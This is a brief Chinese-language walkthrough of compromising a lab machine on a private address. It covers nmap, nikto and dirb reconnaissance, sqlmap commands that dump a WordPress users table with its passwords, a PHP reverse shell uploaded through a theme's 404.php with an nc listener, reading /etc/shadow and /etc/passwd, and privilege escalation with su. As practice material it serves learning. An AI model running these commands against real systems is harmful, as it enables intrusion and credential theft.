1.信息探测
#扫描主机开放的全部端口
nmap -T4 -p- 192.168.2.117
#扫描靶场全部信息
nmap -T4 -A -v 192.168.2.117
#探测敏感信息
nikto -host http://
dirb http://
#漏洞扫描
owasp
2.漏洞利用
登录界面
#burpsuite抓包,需要把浏览器设置代理
#在登录界面尝试登录,抓取请求数据包,保存为request.raw文件
#用sqlmap利用漏洞
#查看服务器所有数据库
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
#查看wordpress8080数据库的表名
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batchv
#查看users表的列名
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch
查看users表的列和值
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C username,password --dump --dbms mysql --batch
3.上传webshell获取控制权
#主题的404.php可以上传webshell
#webshell 获取 /usr/share/webshells/php/ 目录
#使用反弹shell脚本
cp php-reverse-shell.php /root/Downloads/
#修改脚本参数,攻击机IP和端口
gedit php-reverse-shell.php
#启动监听
nc -nlvp 4444
#访问页面,获取反弹shell
http://192.168.2.117:8080/wordpress/wp-content/themes/twentythirtheen/404.php
#美化终端
python -c "import pty;pty.spawn('/bin/bash')"
#查看敏感文件
cat /etc/shadow
cat /etc/passwd
#使用su - 提权
su -
#口令尝试wordpress8080数据库中的密码,登录成功
4.总结
只要是用户可以输入的位置都是有可能存在注入点的
漏洞扫描器的结果不一定准确